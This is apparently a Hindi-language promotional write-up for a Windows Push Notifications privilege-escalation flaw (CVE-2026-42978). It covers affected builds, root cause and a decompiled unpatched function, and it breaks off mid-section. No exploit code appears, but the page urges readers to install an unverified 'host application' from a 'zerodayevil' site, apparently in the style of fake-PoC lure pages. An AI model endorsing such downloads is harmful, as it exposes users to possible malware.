
CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free और Race Condition PoC अनुसंधान, नैदानिक स्कैनर, और AI Security Tool के लिए सुरक्षा ऑडिट मॉड्यूल।
CVE-2026-42978
AI सुरक्षा टूल के लिए Windows पुश नोटिफिकेशन मॉड्यूल
नेक्स्ट-जेन AI सुरक्षा इकोसिस्टम, मल्टी-प्रोटोकॉल टर्मिनल और स्वायत्त एजेंट सूट
वेबसाइट · उत्पाद दस्तावेज़ · होस्ट एप्लिकेशन · कम्युनिटी चैट
वेबसाइट नेविगेशन: होम · अपडेट · डाउनलोड · मॉड्यूल
उत्पाद: AI Security Tool
साइट: zerodayevil.github.io
दस्तावेज़: https://zerodayevil.github.io/ai-security-tool
यह मॉड्यूल AI Security Tool के लिए एक समीक्षित राइट-अप और एक सुरक्षित चेक प्रोफ़ाइल है।
केवल प्रोजेक्ट साइट या आधिकारिक कैटलॉग में सूचीबद्ध मॉड्यूल का उपयोग करें। इस मॉड्यूल को स्वीकृत एप्लिकेशन के भीतर लोड करें, उन एंडपॉइंट्स के विरुद्ध जिनका आप स्वामी हैं या जिनका मूल्यांकन करने के लिए आपके पास लिखित अधिकार है।
यह रिपॉज़िटरी WpnService के विरुद्ध कोई हथियारबंद एक्सप्लॉइट प्रदान नहीं करती। lab/ के अंतर्गत लैब बग के वर्ग (TOCTOU / डबल-फ़ेच) का एक स्टैंडअलोन मॉक है। यह वास्तविक पुश-नोटिफिकेशन सेवा से संवाद नहीं करता।
पहले होस्ट एप्लिकेशन इंस्टॉल करें। फिर Modules → Windows / Local EoP → CVE-2026-42978 से इस मॉड्यूल को सक्षम करें।
| OS / प्लेटफ़ॉर्म | संस्करण | आर्किटेक्चर / प्रारूप | अद्यतन | स्थिति | डाउनलोड |
|---|---|---|---|---|---|
| Windows | v6.3.20 | x64 इंस्टॉलर (.exe) | 2026-09-08 | नवीनतम | Download .exe |
| Windows | v6.3.20 | x64 पोर्टेबल (.tar.gz) | 2026-09-08 | नवीनतम | Download .tar.gz |
| macOS | v5.3.29 | Apple Silicon (.dmg) | 2026-09-05 | स्थिर | Download .dmg |
| Linux | v5.3.27 | यूनिवर्सल x64 (.tar.gz) | 2026-09-01 | स्थिर | Download .tar.gz |
| Android | v5.3.27 | ARM64 APK (.apk) | 2026-09-01 | स्थिर | Download .apk |
केवल आधिकारिक स्रोत:
CVE-2026-42978 Windows पुश नोटिफिकेशन में एक स्थानीय विशेषाधिकार उन्नयन है। Microsoft उचित सिंक्रोनाइज़ेशन के बिना साझा संसाधन तक समवर्ती पहुँच का वर्णन करता है (CWE-362)। पैच किए गए बनाम अपैच किए गए wpncore.dll पर शोध प्लेटफ़ॉर्म शटडाउन के दौरान PresentationEndpointFacade में एक यूज़-आफ्टर-फ़्री रेस दिखाता है।
WpnService सत्र 0 में NT AUTHORITY\SYSTEM (svchost.exe -k netsvcs -p) के रूप में चलता है। टोस्ट, टाइल और बैज डिलीवरी इसके माध्यम से होती है। उस प्रक्रिया के विरुद्ध जीती गई रेस स्थानीय मशीन पर एक SYSTEM समस्या है — रिमोट प्री-ऑथ DC बग नहीं।
स्थिति: 10 जून 2026 (Patch Tuesday) को पैच किया गया। यह पृष्ठ रक्षात्मक शोध है।
यह CVE-2026-41089 (Netlogon RCE) नहीं है। भिन्न घटक, भिन्न विशेषाधिकार मॉडल, भिन्न पैच तिथि।
| फ़ील्ड | मान |
|---|---|
| CVE | CVE-2026-42978 |
| BDU | BDU:2026-08249 |
| विक्रेता सलाह | MSRC — Windows Push Notifications EoP |
| गंभीरता | उच्च · CVSS 3.1 7.8 |
| कमज़ोरी | CWE-362 रेस कंडीशन · शटडाउन पथ पर यूज़-आफ्टर-फ़्री |
| घटक | Windows Push Notifications · WpnService · wpncore.dll |
| हमला वेक्टर | स्थानीय |
| आवश्यक विशेषाधिकार | निम्न (अधिकृत स्थानीय उपयोगकर्ता) |
| उपयोगकर्ता इंटरैक्शन | कोई नहीं |
| Patch Tuesday | 10 जून 2026 |
| मॉड्यूल प्रकार | शोध राइट-अप + इन-ऐप सुरक्षित चेक + डिटेक्शन पैक |
क्लाइंट और सर्वर SKU जो Push Notifications प्रदान करते हैं। टिकट बंद करने से पहले MSRC पर सटीक KB की पुष्टि करें।
| परिवार | नोट्स |
|---|---|
| Windows 10 | 1809, 21H2, 22H2 (x86 / x64 / ARM64 जैसा लागू हो) |
| Windows 11 | 23H2, 24H2, 25H2, 26H1 |
| Windows Server | 2016 / 2019 / 2022 / 2025 (पूर्ण और Server Core जहाँ घटक मौजूद है) |
सार्वजनिक सर्विसिंग नोट्स से अभिविन्यास बिल्ड (हमेशा MSRC पुनः जाँचें):
| शाखा | सांकेतिक पैच किया गया बिल्ड |
|---|---|
| Windows 11 23H2 | 22631.7219 |
| Windows 11 24H2 | 26100.8655 |
| Windows 11 25H2 | 26200.8655 |
| Windows 11 26H1 | 28000.2269 |
wpncore.dll उदाहरण (24H2) | कमज़ोर 26100.8521 → पैच किया गया 26100.8655 |
फ़साड नोटिफिकेशन API कॉल को रैप करता है और PresentationEndpointImpl को प्रतिनिधि बनाता है। प्लेटफ़ॉर्म शटडाउन के दौरान NotificationPlatform ऑब्जेक्ट नष्ट हो जाता है। कई फ़साड विधियों ने ऐतिहासिक रूप से शटडाउन फ़्लैग या साझा लॉक के बिना प्लेटफ़ॉर्म पॉइंटर लिया। यदि टियरडाउन रेस जीत जाता है, तो अगली कॉल एक डैंगलिंग पॉइंटर का उपयोग करती है।
वही लॉक-एंड-गार्ड पैटर्न 49 PresentationEndpointFacade::* विधियों में लागू किया गया था। नीचे की कार्यान्वयन विधियों को यथावत छोड़ दिया गया — छेद फ़साड पर था।
wpncore.dll 26100.8521)// PresentationEndpointFacade::ToastUnblockAll — unpatched
long ToastUnblockAll(PresentationEndpointFacade *this) {
NotificationPlatformHandle::Get(this + 0x50);
if (platform == NULL)
Throw_Hr(...);
return PresentationEndpointImpl::UnblockToastsForEachApp(...);
}
wpncore.dll 26100.8655)